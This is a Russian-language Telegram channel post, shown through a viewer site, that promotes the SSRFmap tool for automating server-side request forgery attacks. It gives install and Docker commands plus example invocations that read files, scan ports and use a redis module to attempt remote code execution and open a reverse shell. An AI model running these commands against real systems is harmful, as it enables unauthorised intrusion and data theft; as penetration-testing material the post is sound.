TGViewer
AP Security AP Security @ap_security · 3.98K subscribers
Post #640 586

Forwarded from Machete Hack

Автоматизация с помощью SSRFmap 👁‍🗨

Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения

☄️ https://github.com/swisskyrepo/SSRFmap ☄️

Ставим на хост
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py


Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py


Пример команды, где опция -r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модули
python ssrfmap.py -r request.txt -p url -m readfiles,portscan


Используем модуль redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shell
python ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242


И в конце небольшой Cheat Sheet по SSRF 💫
  • ❤ 4
  • ❤‍🔥 3
  • 🆒 2
More from @ap_security
  1. Sep 27, 2026Post #1048
  2. Sep 25, 2026#pentest VSEC-REVoid 🧩 VSEC-REVoid — это обфускатор C/C++ с открытым подходом «виртуализа…
  3. Sep 23, 2026#infosec Поиск готовой домашки может закончиться кражей аккаунта и денег родителей 🫸 Жела…
  4. Sep 23, 2026#pentest go-responder 📎 go-responder — это утилита для перехвата NTLM-хешей в локальной с…
  5. Sep 21, 2026#infosec Сентябрьское обновление Windows сломало работу принтеров… опять 💻 Сентябрьское о…
  6. Sep 21, 2026#defensive PingCastle 🎯 Active Directory — это основной, «родной» режим работы утилиты. H…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →